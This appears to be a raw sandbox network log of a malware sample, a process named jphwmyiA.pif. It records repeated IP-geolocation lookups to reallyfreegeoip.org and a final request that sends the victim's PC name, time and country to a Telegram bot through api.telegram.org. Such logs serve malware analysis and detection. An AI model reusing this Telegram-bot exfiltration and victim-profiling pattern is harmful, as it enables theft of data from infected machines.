2025-01-06 06:58:21 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49766	188.114.97.3	443	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:22 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:22 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:22 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461491 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bw7iXzpTGACzb%2Bu4KQBFvvrn2s1ZlXe0spjYWuPuwsKhwNBeZUcF6H8lUCpxj%2BKEWJyoikPAS11zPUaJBvWdIhhNj0cfXi%2BrQlNA5AvaEhhm611xZ4Zzd8zO6l7oZQ08PjdEdTzg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1bb6cdfefa9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1935&rtt_var=744&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1454183&cwnd=158&unsent_bytes=0&cid=aa4a087191c1f040&ts=152&x=0"
2025-01-06 06:58:22 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49769	188.114.97.3	443	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:23 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:23 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:23 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461493 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cqH7fUeF6moWVe2vfWbuW%2BQ6cAn334OuTEIdJtAwTBdkoS79NYWLre%2By0xUb7fCj5aE1WFIgm3SEIvfEo%2Beud%2FKJYgpAllvzlazvVY3DyxeQCy%2F1VS4KU42j%2BgKz2A7TAOz3MfBz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1c38ef20cc2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1630&rtt_var=642&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1791411&cwnd=176&unsent_bytes=0&cid=75e519d4a5ce81cd&ts=149&x=0"
2025-01-06 06:58:23 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49772	188.114.97.3	443	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:24 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:24 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:24 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461493 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VqycW%2BwpMxyydX5ufn5B%2BAVHPsx9AWy0zrr1UqUtLh0Y8IeeqOz4OHzC5bA%2FNd23IRmLG%2BfEbbk1wDTetwrIqO1YttezonXEByLM46ZGvwIGwBrZulcvAdQT008gDAXze3cv3QhK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1c88e815e62-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2000&rtt_var=776&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1387832&cwnd=139&unsent_bytes=0&cid=d04d5595f7893473&ts=176&x=0"
2025-01-06 06:58:24 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49773	188.114.97.3	443	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:25 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461494 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJY12corBPYNZCvwHp30P5jV7PdpfiXR00QZH77ZKMgXPnU492btd7ppfKFxNq3z7DcL%2BidrkU9bIAA7FxKWI6Wo7o1lWzxlfrKc2mj7VwgXtkhVANYKafze7fbjxnl8I%2Fa79b6f"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1cc0ac95e74-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2337&min_rtt=2288&rtt_var=893&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1276223&cwnd=112&unsent_bytes=0&cid=6614f7a15d3130d9&ts=146&x=0"
2025-01-06 06:58:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49774	188.114.97.3	443	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:25 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:25 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:25 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461494 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cK4t85ovkv0HEY8l7q9XsdfU672MmbOnyuMOBA9emgyrah3Bd%2FKYQI1Mk95YO0FrxjRM%2Bt4mtMVyXUlVBLWYAxo6I0Nsf0Sa3v2CRFG%2BVwsfYrC6znEwgTHbKm5T%2FYzrZzuVg4an"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1cdba0141ac-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1679&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1708601&cwnd=252&unsent_bytes=0&cid=c0c754177ab9aba2&ts=176&x=0"
2025-01-06 06:58:25 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49777	188.114.97.3	443	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:26 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:26 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461495 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qQKMMmhQyDrb22w24vYwKyvPYgAJIZFF6FHxx1CMFICgrk9m%2F%2FnRCCCqBFa%2F1azewUkPbhTMfuD0C5zGUtT6uAtiacfAYx4M6X%2BqU%2BkksbnUXAeoWhZJIxEqsk1omnJHZHLsaQjF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1d40f5defa5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2019&rtt_var=758&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1442687&cwnd=191&unsent_bytes=0&cid=72008bdc4294606f&ts=141&x=0"
2025-01-06 06:58:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49778	188.114.97.3	443	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:26 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:26 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461496 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rDGJbU4BFDqMvf5ryXoKm7d2JUd1qRr1muGYmIzDcC%2Fn9Lqp9jgev4LNGeKbckd0t727mOS4JM1E0jsFGxIUNBJuRjBRuzj0f1%2BQ3%2B%2BdoEUbkJEdeeA%2BzOH1rWxmhCIgnhQ7gcuB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1d5e86242dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1739&rtt_var=668&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1679125&cwnd=251&unsent_bytes=0&cid=a82a443737a6c84e&ts=134&x=0"
2025-01-06 06:58:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49781	188.114.97.3	443	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:27 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-06 06:58:27 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461497 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLvNgrhtWjfIQAPyZq%2Fa0e0Rcgiu%2BbXi7EB9SRgcp8iibjc%2FvbNYg0BqHK52sLBxutcEatDPkj2aS9FdcOMO6P6TZIHo8kNwwpuRo1WVEI3gdeewhgIE5VFHFkuiSLdwb5XXa%2BsW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1dc29f8c411-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1504&rtt_var=565&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1936339&cwnd=224&unsent_bytes=0&cid=99882cbf64bb6f09&ts=155&x=0"
2025-01-06 06:58:27 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49782	188.114.97.3	443	3808	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:28 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-06 06:58:28 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 06 Jan 2025 06:58:28 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1461497 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JlA9yEh%2FXho0WRu22d7rGEOWkS8ZssUNsByRH7TWoO0ilrsAf3ePZdGeAHjoULVIIHoRJnq%2FCx%2FIgkZWQ1OstCf0C%2BPZBBzxoJuxADKRCPrCzyY5yax5jLko9R2ii%2BK11923RmzB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd9d1ddf957c327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1667&rtt_var=637&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1701631&cwnd=189&unsent_bytes=0&cid=8975b71f19cd6758&ts=141&x=0"
2025-01-06 06:58:28 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49783	149.154.167.220	443	6800	C:\Users\Public\Libraries\jphwmyiA.pif

Timestamp	Bytes transferred	Direction	Data
2025-01-06 06:58:28 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:03:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-06 06:58:28 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 06 Jan 2025 06:58:28 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
